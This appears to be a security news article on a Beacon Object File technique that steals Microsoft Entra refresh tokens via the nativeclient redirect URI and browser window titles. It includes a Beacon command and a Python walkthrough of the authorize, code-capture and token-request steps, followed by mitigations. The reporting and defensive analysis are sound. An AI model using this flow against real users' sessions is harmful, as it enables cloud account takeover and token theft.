New Exploit Method Extracts Microsoft Entra Tokens Through Beacon

A novel exploit method leveraging Beacon Object Files (BOFs) has emerged, enabling attackers to extract Microsoft Entra (formerly Azure AD) tokens from compromised endpoints, even on non-domain-joined or BYOD devices.

Because the flow runs through the victim's own browser session and uses a Microsoft-owned redirect URI rather than a local listener, it avoids the localhost traffic defenders might watch for and returns refresh tokens for high-value Microsoft first-party apps, a significant risk to enterprise cloud environments.

PRT Extraction Limits on BYOD Devices

Attackers often rely on extracting Primary Refresh Tokens (PRTs) from domain-joined devices to maintain access to Entra tenants.


However, as detailed in Matthew Creel’s “Operator’s Guide to Device-Joined Hosts and the PRT Cookie,” PRT-based methods fail on non-domain-joined hosts.

In such cases, attackers faced a roadblock: how to obtain refresh tokens without triggering alerts or requiring privileged access.

TrustedSec’s recently released get_azure_token BOF (by Christopher Paschen) was the starting point for the new approach.

JUMPSEC’s TokenSmith tool being used with the “authcode” functionality, generating an authorization code flow URL (Microsoft Teams client ID).

The existing approach initiates an Entra authorization code flow via the victim’s browser, captures the authorization code with a local HTTP listener, and exchanges it for tokens.

However, its reliance on http://localhost as a redirect URI limited targets to three FOCI-enabled apps: Azure CLI, Azure PowerShell, and Visual Studio Legacy.

Authorization code returned in URL and window title

Researchers discovered that repurposing Microsoft’s native client redirect URI (https://login.microsoftonline.com/common/oauth2/nativeclient) bypasses the localhost restriction. This URI, designed for desktop/mobile apps, allows attackers to:

  1. Target high-value FOCI apps like Microsoft Teams, Copilot, and Edge.
  2. Extract authorization codes from browser window titles using the GetWindowTextA API.
  3. Exchange codes for tokens without relying on easily monitored localhost redirects.

Technical Breakdown: How the Exploit Works

  1. BOF Execution: The attacker’s Beacon sends a command to launch a browser with a crafted Entra authcode URL.
  2. Code Capture: After the victim authenticates, the authorization code appears in the browser’s window title.
  3. Token Exchange: The BOF extracts the code and requests access/refresh tokens, which are exfiltrated to the attacker.

Example Command:

beacon> entra-authcode-flow 1fec8e78-bce4-4a03-aa91-5d88d2d7a83b "User.Read"

(Uses Microsoft Teams’ client ID for stealth)
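The three steps above, reproduced offline in Python as an added example (this is not the JUMPSEC or TrustedSec BOF code). It builds the authorize URL with Microsoft's nativeclient redirect URI and the Teams client ID quoted in the article, recovers the authorization code from a browser window title (the BOF obtains that string with GetWindowTextA; here it is a constructed sample, and its exact layout is an assumption), and prepares the token-exchange body. PKCE is included because it is standard for public OAuth clients, not because the article mentions it. No request is sent.

```python
# Added example, not code from the article or from the tools it describes.
import base64
import hashlib
import re
import secrets
from urllib.parse import urlencode

AUTHORITY = "https://login.microsoftonline.com/common"
AUTHORIZE_ENDPOINT = f"{AUTHORITY}/oauth2/v2.0/authorize"
TOKEN_ENDPOINT = f"{AUTHORITY}/oauth2/v2.0/token"
# Microsoft's native-client redirect URI; no local listener is needed.
NATIVE_CLIENT_REDIRECT = f"{AUTHORITY}/oauth2/nativeclient"
TEAMS_CLIENT_ID = "1fec8e78-bce4-4a03-aa91-5d88d2d7a83b"  # Teams ID quoted in the article


def make_pkce_pair():
    """Return (code_verifier, code_challenge) per RFC 7636, S256 method."""
    verifier = secrets.token_urlsafe(48)  # 64 unreserved characters
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
    return verifier, challenge


def build_authorize_url(client_id, scope, state, code_challenge):
    """Step 1: the URL a Beacon would hand to the victim's browser."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": NATIVE_CLIENT_REDIRECT,
        "response_mode": "query",
        # offline_access is what makes the token endpoint return a refresh token
        "scope": f"openid offline_access {scope}",
        "state": state,
        "code_challenge": code_challenge,
        "code_challenge_method": "S256",
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


_CODE_RE = re.compile(r"(?:^|[?&\s])code=([^&\s]+)")
_STATE_RE = re.compile(r"(?:^|[?&\s])state=([^&\s]+)")


def extract_code_from_title(window_title, expected_state=None):
    """Step 2: pull the authorization code out of a captured window title.

    Returns None when no code is present or the state does not match,
    so a stale or unrelated title is not mistaken for a redirect.
    """
    m = _CODE_RE.search(window_title)
    if not m:
        return None
    if expected_state is not None:
        s = _STATE_RE.search(window_title)
        if not s or s.group(1) != expected_state:
            return None
    return m.group(1)


def build_token_request(client_id, code, scope, code_verifier):
    """Step 3: form body for the authorization_code grant (public client, no secret)."""
    return {
        "client_id": client_id,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": NATIVE_CLIENT_REDIRECT,
        "scope": f"openid offline_access {scope}",
        "code_verifier": code_verifier,
    }


# Constructed sample of a browser title after the nativeclient redirect.
# Assumption: the title carries the redirect query string; the code value is made up.
SAMPLE_TITLE = (
    "code=0.AXEAsampleAuthCodeValue.AQABAAIAAAD&state=beacon42"
    "&session_state=7f3a0d1e - Microsoft Edge"
)


def demo(window_title=SAMPLE_TITLE):
    """Run all three steps against a captured title; returns (url, code, body)."""
    verifier, challenge = make_pkce_pair()
    state = "beacon42"
    url = build_authorize_url(TEAMS_CLIENT_ID, "User.Read", state, challenge)
    code = extract_code_from_title(window_title, expected_state=state)
    body = None if code is None else build_token_request(TEAMS_CLIENT_ID, code, "User.Read", verifier)
    return url, code, body


if __name__ == "__main__":
    url, code, body = demo()
    print("authorize URL:", url)
    print("captured code:", code)
    print("POST", TOKEN_ENDPOINT, body)
```

The state check is the part a practitioner should keep: without it, any window whose title happens to contain `code=` (a different sign-in, a stale tab) would be exchanged. The request body shows what a defender would see at the token endpoint: a first-party client ID with the nativeclient redirect URI, which is exactly how a legitimate desktop client looks.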

Mitigation Recommendations

  1. Monitor Token Requests: Flag authorization-code sign-ins to first-party client IDs that do not fit the host (e.g., Teams tokens issued on a machine where the Teams client is not running), and follow up on refresh-token use that does not match that host.
  2. Restrict App Consent: FOCI clients are Microsoft first-party apps and are not governed by user-consent settings, so consent restrictions alone do not stop this flow; still audit and limit third-party app consent in Entra ID to reduce the tokens an attacker can obtain by the same route.
  3. User Training: Educate employees on phishing risks, since the attack requires the attacker to already be running code (the Beacon) on the endpoint that can open a browser as the user.
  4. Conditional Access: Enforce device compliance policies for sensitive apps, so tokens cannot be issued from unmanaged or BYOD devices in the first place.

This technique highlights the growing sophistication of token theft against cloud identities: unlike adversary-in-the-middle (AiTM) phishing, it needs no proxy in the sign-in path, only code running on the endpoint and the user’s existing browser session.

As JUMPSEC’s TokenSmith and TrustedSec’s tools gain traction, defenders must prioritize monitoring native OAuth flows and hardening Entra configurations.

The proof-of-concept BOF and analysis are available on GitHub, underscoring the urgency for proactive defense measures.
